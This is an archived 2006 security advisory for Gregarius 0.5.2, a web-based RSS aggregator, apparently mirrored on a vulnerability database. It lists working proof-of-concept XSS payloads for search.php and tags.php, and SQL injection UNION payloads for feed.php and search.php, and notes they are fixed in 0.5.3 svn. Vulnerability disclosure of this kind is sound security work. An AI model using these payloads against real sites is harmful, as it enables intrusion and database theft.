Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11678
HistoryMar 03, 2006 - 12:00 a.m.

Gregarius 0.5.2 XSS and SQL Injection Vulnerabilities

2006-03-0300:00:00
vulners.com
13
JSON

http://gregarius.net/
Gregarius is a web-based RSS/RDF/ATOM feed aggregator, designed to run on your web server, allowing you to
access your news sources from wherever you want.

XSS in search.php:
search.php?rss_query=<script>alert(1)</script>&rss_query_match=exact

XSS in tags.php:
tags.php?tag=<script>alert(1)</script>

SQL Injection in feed.php:
feed.php?folder=3 and 1=1 UNION select title from item–

with magic_quotes=off:
SQL Injection in search.php:
search.php?rss_query=aa%')) UNION select null,null,null,null,null,null,null,null,null,null,null,title,null
from item-- &rss_query_match=exact

On Gregarius 0.5.2/PostrgreSQL this could lead to damaging/altering the DB and possible local file
disclosure due to not properly sanitized $lang include, on early 0.5.3 svn version to admin hash disclosure.
More XSS and SQL Injections in admin section.

Fixed in latest 0.5.3 svn.

JSON